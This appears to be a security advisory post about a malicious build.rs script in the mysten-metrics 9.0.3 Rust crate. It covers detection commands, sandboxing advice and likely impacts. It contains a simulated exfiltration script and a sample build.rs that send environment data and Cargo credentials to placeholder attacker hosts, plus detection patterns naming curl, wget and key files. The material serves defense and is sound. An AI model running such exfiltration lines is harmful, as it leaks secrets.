The vulnerability is in the `build.rs` script of the `mysten-metrics` crate, version 9.0.3. Cargo build scripts execute arbitrary code at compile time, with the full permissions of the user running `cargo build`, and this one was used to exfiltrate data. It collected environment variables and system details, and possibly stored credentials; the script likely read files such as `~/.cargo/credentials` and `~/.ssh/id_rsa`. The gathered data was then sent to a remote server, via HTTP POST or DNS tunnelling.

The attack targeted developers and CI systems that pulled the crate. Version 9.0.3 was published to crates.io on 2026-04-20 and removed shortly after detection, once the OpenSSF Package Analysis project flagged it. The crate declared no dependencies, so the malicious code was self-contained. No confirmed use of the malicious version in the wild has been found.

This is a classic software-supply-chain compromise. Cargo does not sandbox build scripts, so the script had exactly the system access of the developer or CI account that ran the build. Such attacks can lead to credential theft, source-code leaks or persistent backdoors. Anyone who built with this version should assume potential compromise and rotate every credential that was present in the build environment.
DailyCVE form
Platform: crates.io
Version: 9.0.3
Vulnerability: Malicious build script
Severity: Critical
Date: 2026-04-20
Prediction: No patch available
Analytics – What Undercode Says:
Check Cargo.lock for the malicious version. Each `[[package]]` stanza lists `name` on one line and `version` on the next, so one line of context is enough:

```bash
grep -A 1 'name = "mysten-metrics"' Cargo.lock | grep 'version = "9.0.3"'
```

Scan the `build.rs` of every downloaded dependency for suspicious patterns. Dependency sources live in the registry cache (`$CARGO_HOME/registry/src`, or in `vendor/` after `cargo vendor`), not under `target/`, which only holds the compiled build scripts and their output; `grep` needs `-E` for the alternation to be treated as a regex:

```bash
find "${CARGO_HOME:-$HOME/.cargo}/registry/src" -name build.rs \
  -exec grep -lE 'exfiltrate|curl|wget|POST|Command::new|TcpStream' {} +
```

Monitor network connections during the build (Linux). `strace` traces only the `cargo` process by default; `-f` follows the `rustc` and build-script children, which is where a connection would be made:

```bash
strace -f -e trace=network cargo build 2>&1 | grep -E 'connect|sendto'
```

Simulated exfiltration script (the malicious `build.rs` logic expressed as a shell script; `attacker.com` is a placeholder). Note that newer Cargo versions store the crates.io token in `~/.cargo/credentials.toml` as well:

```bash
#!/bin/bash
# Collect the whole environment plus the crates.io token, then POST it out
DATA=$(env && cat ~/.cargo/credentials 2>/dev/null)
curl -X POST -d "$DATA" https://attacker.com/log
```
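The two checks above, written as reusable shell functions that can be run offline. This is an added example, not code from the original post or from the mysten-metrics project: the crate name and version come from the advisory, while the registry path layout, the suspicious-pattern list, the sample `Cargo.lock` and the stand-in `build.rs` files are constructed assumptions. The lockfile check walks `Cargo.lock` stanza by stanza so a `version` line is only compared with the `name` line of its own `[[package]]` block, which a `grep -A` pipeline cannot guarantee when stanzas are reordered or fields are missing.

```bash
#!/usr/bin/env bash
# Added example (not part of the original post): portable checks for a
# malicious-build-script incident. The crate name and version come from the
# advisory above; the registry path layout, the suspicious-pattern list and
# the sample files below are constructed assumptions.

# Patterns a reviewer would not expect in an honest build.rs (assumed list).
SUSPICIOUS='Command::new|curl|wget|TcpStream|reqwest|ureq|\.ssh/|\.cargo/credentials'

# lock_has_package NAME VERSION [LOCKFILE]
# Walks Cargo.lock stanza by stanza so a version line is only compared with
# the name line of the same [[package]] block.
# Exit status 0 if the exact (name, version) is pinned, 1 otherwise.
lock_has_package() {
  awk -v want_name="$1" -v want_ver="$2" '
    /^\[\[package\]\]/ { name = ""; ver = "" }
    /^name = /         { gsub(/"/, "", $3); name = $3 }
    /^version = /      { gsub(/"/, "", $3); ver = $3
                         if (name == want_name && ver == want_ver) { found = 1; exit } }
    END { exit (found ? 0 : 1) }
  ' "${3:-Cargo.lock}"
}

# scan_build_scripts DIR [REGEX]
# Prints every build.rs under DIR that matches REGEX (default: SUSPICIOUS).
# Exit status 0 if at least one file matched, 1 if none did.
scan_build_scripts() {
  local hits
  hits=$(find "$1" -type f -name build.rs -exec grep -lE "${2:-$SUSPICIOUS}" {} + 2>/dev/null)
  [ -n "$hits" ] && printf '%s\n' "$hits"
}

# make_sample_tree: builds a throwaway Cargo.lock and registry cache so the
# checks can be exercised offline. Everything in it is constructed sample
# data; attacker.example is a placeholder host.
make_sample_tree() {
  local dir
  dir=$(mktemp -d)
  cat > "$dir/Cargo.lock" <<'EOF'
# This file is automatically @generated by Cargo.
version = 3

[[package]]
name = "mysten-metrics"
version = "9.0.3"
source = "registry+https://github.com/rust-lang/crates.io-index"

[[package]]
name = "other-crate"
version = "9.0.3"
source = "registry+https://github.com/rust-lang/crates.io-index"
EOF
  mkdir -p "$dir/registry/src/index/mysten-metrics-9.0.3" \
           "$dir/registry/src/index/benign-1.0.0"
  # Constructed stand-in for an exfiltrating build script (not the real one)
  cat > "$dir/registry/src/index/mysten-metrics-9.0.3/build.rs" <<'EOF'
use std::process::Command;
fn main() {
    let home = std::env::var("HOME").unwrap_or_default();
    let creds = std::fs::read_to_string(format!("{home}/.cargo/credentials")).unwrap_or_default();
    let _ = Command::new("curl").args(["-d", &creds, "https://attacker.example/log"]).output();
}
EOF
  # An ordinary build script that only emits a rerun directive
  cat > "$dir/registry/src/index/benign-1.0.0/build.rs" <<'EOF'
fn main() {
    println!("cargo:rerun-if-changed=build.rs");
}
EOF
  printf '%s\n' "$dir"
}

# Stand-alone demo against the constructed tree; against a real checkout use
# ./Cargo.lock and "${CARGO_HOME:-$HOME/.cargo}/registry/src" instead.
sample=$(make_sample_tree)
if lock_has_package mysten-metrics 9.0.3 "$sample/Cargo.lock"; then
  echo "Cargo.lock pins mysten-metrics 9.0.3: treat the build host as compromised"
fi
echo "build scripts matching suspicious patterns:"
scan_build_scripts "$sample/registry/src" || echo "(none)"
rm -rf "$sample"
```

Against a real project, run `lock_has_package mysten-metrics 9.0.3` in the workspace root and `scan_build_scripts "${CARGO_HOME:-$HOME/.cargo}/registry/src"`; a match from the scanner is a reason to read the file, not proof of compromise, since some legitimate build scripts do spawn external tools.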
Exploit
The attacker embeds the malicious code in `build.rs`. When a developer or CI system runs `cargo build`, Cargo compiles and runs the script before compiling the crate itself; no opt-in is required. The script collects sensitive data, either through the Rust standard library (`std::env`, `std::fs`) or by spawning commands such as `env`, `cat` and `ls -R` via `std::process::Command`, and exfiltrates it with an HTTP request to a remote server. The attack is stealthy: Cargo captures build-script output to `target/<profile>/build/<crate>-<hash>/output` instead of printing it, and build logs rarely show network activity.
Protection from this CVE
- Use `cargo-audit` to detect known malicious crates. It only reports crates that have an entry in the RustSec advisory database, so it cannot catch a malicious release before that entry exists:

```bash
cargo install cargo-audit
cargo audit
```

- Run builds in isolated, ephemeral sandboxes (containers, VMs), ideally with no network access once dependencies are fetched: for example a container started with `--network none` and a pre-populated `$CARGO_HOME`, or on Linux `unshare -rn cargo build --offline`.
- Avoid untrusted crates; prefer those from verified sources and established maintainers.
- Monitor network egress from build environments. A build script rarely has a legitimate reason to open outbound connections, so any connection from one deserves a look.
- Pin dependencies (commit `Cargo.lock`) and review the `build.rs` of every new dependency or version bump, for example on the sources produced by `cargo vendor`.
Impact
- Exfiltration of environment variables (e.g., `GITHUB_TOKEN`, `NPM_TOKEN`).
- Theft of SSH keys and Cargo credentials.
- Potential leakage of proprietary source code if build machine has repository access.
- The compromise could lead to further infiltration of internal pipelines.
- Although no active usage was confirmed, any project that included the crate is at risk.
Sources:
Reported By: github.com

